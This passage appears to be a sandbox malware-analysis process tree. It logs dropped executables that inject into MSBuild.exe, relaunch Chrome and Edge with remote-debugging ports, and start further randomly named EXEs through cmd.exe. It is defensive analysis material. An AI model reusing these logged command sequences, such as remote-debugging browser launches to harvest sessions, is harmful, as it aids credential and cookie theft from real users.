              - Executes dropped EXE
              - System Location Discovery: System Language Discovery
              [level 8] C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe
                Command line: "C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"
                PID: 384
                - Executes dropped EXE
                - Suspicious use of SetThreadContext
                [level 9] C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  PID: 2784
                [level 9] C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  PID: 4424
                  - System Location Discovery: System Language Discovery
                  - Suspicious behavior: EnumeratesProcesses
              [level 8] C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
                Command line: "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
                PID: 4016
                - Executes dropped EXE
                - Suspicious use of SetThreadContext
                [level 9] C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  PID: 5856
                  - System Location Discovery: System Language Discovery
                  - Checks processor information in registry
                  - Suspicious behavior: EnumeratesProcesses
                  [level 10] C:\Program Files\Google\Chrome\Application\chrome.exe
                    Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                    PID: 2924
                    - Uses browser remote debugging
                    - Checks processor information in registry
                    - Enumerates system info in registry
                    - Modifies data under HKEY_USERS
                    - Suspicious behavior: EnumeratesProcesses
                    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                    - Suspicious use of AdjustPrivilegeToken
                    - Suspicious use of FindShellTrayWindow
                    [level 11] C:\Program Files\Google\Chrome\Application\chrome.exe
                      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe4347dcf8,0x7ffe4347dd04,0x7ffe4347dd10
                      PID: 6132
                    [level 11] C:\Program Files\Google\Chrome\Application\chrome.exe
                      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1964,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=1952 /prefetch:2
                      PID: 1676
                    [level 11] C:\Program Files\Google\Chrome\Application\chrome.exe
                      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1560,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2240 /prefetch:3
                      PID: 1964
                    [level 11] C:\Program Files\Google\Chrome\Application\chrome.exe
                      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2368,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2444 /prefetch:8
                      PID: 3140
                    [level 11] C:\Program Files\Google\Chrome\Application\chrome.exe
                      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3136 /prefetch:1
                      PID: 2040
                      - Uses browser remote debugging
                    [level 11] C:\Program Files\Google\Chrome\Application\chrome.exe
                      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2580,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3356 /prefetch:1
                      PID: 624
                      - Uses browser remote debugging
                    [level 11] C:\Program Files\Google\Chrome\Application\chrome.exe
                      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3984,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4048 /prefetch:2
                      PID: 3104
                      - Uses browser remote debugging
                    [level 11] C:\Program Files\Google\Chrome\Application\chrome.exe
                      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4608,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4584 /prefetch:1
                      PID: 860
                      - Uses browser remote debugging
                    [level 11] C:\Program Files\Google\Chrome\Application\chrome.exe
                      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5180,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5208 /prefetch:8
                      PID: 4584
                    [level 11] C:\Program Files\Google\Chrome\Application\chrome.exe
                      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5296,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5308 /prefetch:8
                      PID: 3480
                    [level 11] C:\Program Files\Google\Chrome\Application\chrome.exe
                      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5228,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5212 /prefetch:8
                      PID: 3232
                    [level 11] C:\Program Files\Google\Chrome\Application\chrome.exe
                      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3704,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5700 /prefetch:8
                      PID: 3248
                    [level 11] C:\Program Files\Google\Chrome\Application\chrome.exe
                      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5448,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5864 /prefetch:8
                      PID: 2528
                    [level 11] C:\Program Files\Google\Chrome\Application\chrome.exe
                      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5356,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5856 /prefetch:8
                      PID: 4076
                  [level 10] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                    PID: 5612
                    - Uses browser remote debugging
                    [level 11] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2a4,0x7ffe4345f208,0x7ffe4345f214,0x7ffe4345f220
                      PID: 116
                    [level 11] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1980,i,11673979220982409735,5945991548986697935,262144 --variations-seed-version --mojo-platform-channel-handle=1972 /prefetch:2
                      PID: 5784
                    [level 11] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1776,i,11673979220982409735,5945991548986697935,262144 --variations-seed-version --mojo-platform-channel-handle=2020 /prefetch:3
                      PID: 2732
                    [level 11] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1424,i,11673979220982409735,5945991548986697935,262144 --variations-seed-version --mojo-platform-channel-handle=2704 /prefetch:8
                      PID: 6036
                    [level 11] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3552,i,11673979220982409735,5945991548986697935,262144 --variations-seed-version --mojo-platform-channel-handle=3612 /prefetch:1
                      PID: 3744
                      - Uses browser remote debugging
                    [level 11] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3584,i,11673979220982409735,5945991548986697935,262144 --variations-seed-version --mojo-platform-channel-handle=3640 /prefetch:1
                      PID: 544
                      - Uses browser remote debugging
                  [level 10] C:\ProgramData\knyukx4ect.exe
                    Command line: "C:\ProgramData\knyukx4ect.exe"
                    PID: 6948
                    [level 11] C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      PID: 6980
                  [level 10] C:\ProgramData\wb1n79r9hd.exe
                    Command line: "C:\ProgramData\wb1n79r9hd.exe"
                    PID: 6228
                    [level 11] C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      PID: 6224
                      [level 12] C:\Program Files\Google\Chrome\Application\chrome.exe
                        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                        PID: 25076
                        - Uses browser remote debugging
                        [level 13] C:\Program Files\Google\Chrome\Application\chrome.exe
                          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffe4482dcf8,0x7ffe4482dd04,0x7ffe4482dd10
                          PID: 25100
                        [level 13] C:\Program Files\Google\Chrome\Application\chrome.exe
                          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2460,i,18214201051692195809,14663199719591728026,262144 --variations-seed-version --mojo-platform-channel-handle=2456 /prefetch:2
                          PID: 25508
                        [level 13] C:\Program Files\Google\Chrome\Application\chrome.exe
                          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1572,i,18214201051692195809,14663199719591728026,262144 --variations-seed-version --mojo-platform-channel-handle=2488 /prefetch:3
                          PID: 25516
                        [level 13] C:\Program Files\Google\Chrome\Application\chrome.exe
                          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2088,i,18214201051692195809,14663199719591728026,262144 --variations-seed-version --mojo-platform-channel-handle=2832 /prefetch:8
                          PID: 25552
                        [level 13] C:\Program Files\Google\Chrome\Application\chrome.exe
                          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3232,i,18214201051692195809,14663199719591728026,262144 --variations-seed-version --mojo-platform-channel-handle=3284 /prefetch:1
                          PID: 25580
                          - Uses browser remote debugging
                        [level 13] C:\Program Files\Google\Chrome\Application\chrome.exe
                          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3240,i,18214201051692195809,14663199719591728026,262144 --variations-seed-version --mojo-platform-channel-handle=3304 /prefetch:1
                          PID: 25588
                          - Uses browser remote debugging
                        [level 13] C:\Program Files\Google\Chrome\Application\chrome.exe
                          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4264,i,18214201051692195809,14663199719591728026,262144 --variations-seed-version --mojo-platform-channel-handle=4284 /prefetch:2
                          PID: 20156
                          - Uses browser remote debugging
                        [level 13] C:\Program Files\Google\Chrome\Application\chrome.exe
                          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4640,i,18214201051692195809,14663199719591728026,262144 --variations-seed-version --mojo-platform-channel-handle=4656 /prefetch:1
                          PID: 25268
                          - Uses browser remote debugging
                        [level 13] C:\Program Files\Google\Chrome\Application\chrome.exe
                          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5032,i,18214201051692195809,14663199719591728026,262144 --variations-seed-version --mojo-platform-channel-handle=5044 /prefetch:8
                          PID: 4596
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""12⤵
- Uses browser remote debugging
PID:25644 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --edge-skip-compat-layer-relaunch13⤵
- Uses browser remote debugging
PID:25748 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x2f0,0x7ffe44c3f208,0x7ffe44c3f214,0x7ffe44c3f22014⤵PID:26104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1876,i,9476823008155943959,7379967352101494505,262144 --variations-seed-version --mojo-platform-channel-handle=2696 /prefetch:314⤵PID:26412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2568,i,9476823008155943959,7379967352101494505,262144 --variations-seed-version --mojo-platform-channel-handle=2552 /prefetch:214⤵PID:24572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2172,i,9476823008155943959,7379967352101494505,262144 --variations-seed-version --mojo-platform-channel-handle=2940 /prefetch:814⤵PID:860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3456,i,9476823008155943959,7379967352101494505,262144 --variations-seed-version --mojo-platform-channel-handle=3512 /prefetch:114⤵
- Uses browser remote debugging
PID:25716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3464,i,9476823008155943959,7379967352101494505,262144 --variations-seed-version --mojo-platform-channel-handle=3520 /prefetch:114⤵
- Uses browser remote debugging
PID:25732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4664,i,9476823008155943959,7379967352101494505,262144 --variations-seed-version --mojo-platform-channel-handle=5004 /prefetch:814⤵PID:26116
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4904,i,9476823008155943959,7379967352101494505,262144 --variations-seed-version --mojo-platform-channel-handle=5080 /prefetch:814⤵PID:24988
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\GCFCFCGCGI.exe"12⤵PID:11996
-
C:\Users\Admin\GCFCFCGCGI.exe"C:\Users\Admin\GCFCFCGCGI.exe"13⤵PID:11080
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"14⤵PID:11008
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"15⤵
- Uses browser remote debugging
PID:19948 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffe5472dcf8,0x7ffe5472dd04,0x7ffe5472dd1016⤵PID:20696
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1988,i,16348002627858791121,13740926337866850820,262144 --variations-seed-version --mojo-platform-channel-handle=1984 /prefetch:216⤵PID:22404
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2144,i,16348002627858791121,13740926337866850820,262144 --variations-seed-version --mojo-platform-channel-handle=2132 /prefetch:316⤵PID:6460
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2276,i,16348002627858791121,13740926337866850820,262144 --variations-seed-version --mojo-platform-channel-handle=2808 /prefetch:816⤵PID:23308
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3236,i,16348002627858791121,13740926337866850820,262144 --variations-seed-version --mojo-platform-channel-handle=3300 /prefetch:116⤵
- Uses browser remote debugging
PID:23072
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3244,i,16348002627858791121,13740926337866850820,262144 --variations-seed-version --mojo-platform-channel-handle=3320 /prefetch:116⤵
- Uses browser remote debugging
PID:22892
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4204,i,16348002627858791121,13740926337866850820,262144 --variations-seed-version --mojo-platform-channel-handle=4232 /prefetch:216⤵
- Uses browser remote debugging
PID:18316
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4596,i,16348002627858791121,13740926337866850820,262144 --variations-seed-version --mojo-platform-channel-handle=4452 /prefetch:116⤵
- Uses browser remote debugging
PID:23108
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4808,i,16348002627858791121,13740926337866850820,262144 --variations-seed-version --mojo-platform-channel-handle=4928 /prefetch:816⤵PID:10236
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\IIJEBFCFIJ.exe"12⤵PID:11088
-
C:\Users\Admin\IIJEBFCFIJ.exe"C:\Users\Admin\IIJEBFCFIJ.exe"13⤵PID:10756
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"14⤵PID:10712
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\BKJKJEHJJD.exe"12⤵PID:9664
-
C:\Users\Admin\BKJKJEHJJD.exe"C:\Users\Admin\BKJKJEHJJD.exe"13⤵PID:10396
-
C:\Users\Admin\AppData\Local\Temp\PW4Lcljo\bbE3GYiwqAzDhysT.exeC:\Users\Admin\AppData\Local\Temp\PW4Lcljo\bbE3GYiwqAzDhysT.exe 014⤵PID:10376
-
C:\Users\Admin\AppData\Local\Temp\PW4Lcljo\bfwPSGVrNnP06fHt.exeC:\Users\Admin\AppData\Local\Temp\PW4Lcljo\bfwPSGVrNnP06fHt.exe 1037615⤵PID:10320
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10320 -s 63216⤵
- Program crash
PID:24396
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10376 -s 96815⤵
- Program crash
PID:18608
C:\ProgramData\h4wb1dbiek.exe"C:\ProgramData\h4wb1dbiek.exe"10⤵PID:4552
-
C:\Users\Admin\AppData\Local\Temp\mM4zRoPf\sHmUQoFG1f5KA3vK.exeC:\Users\Admin\AppData\Local\Temp\mM4zRoPf\sHmUQoFG1f5KA3vK.exe 011⤵PID:3052
-
C:\Users\Admin\AppData\Local\Temp\mM4zRoPf\I5SvKir3cjYvYxin.exeC:\Users\Admin\AppData\Local\Temp\mM4zRoPf\I5SvKir3cjYvYxin.exe 305212⤵PID:2528
-
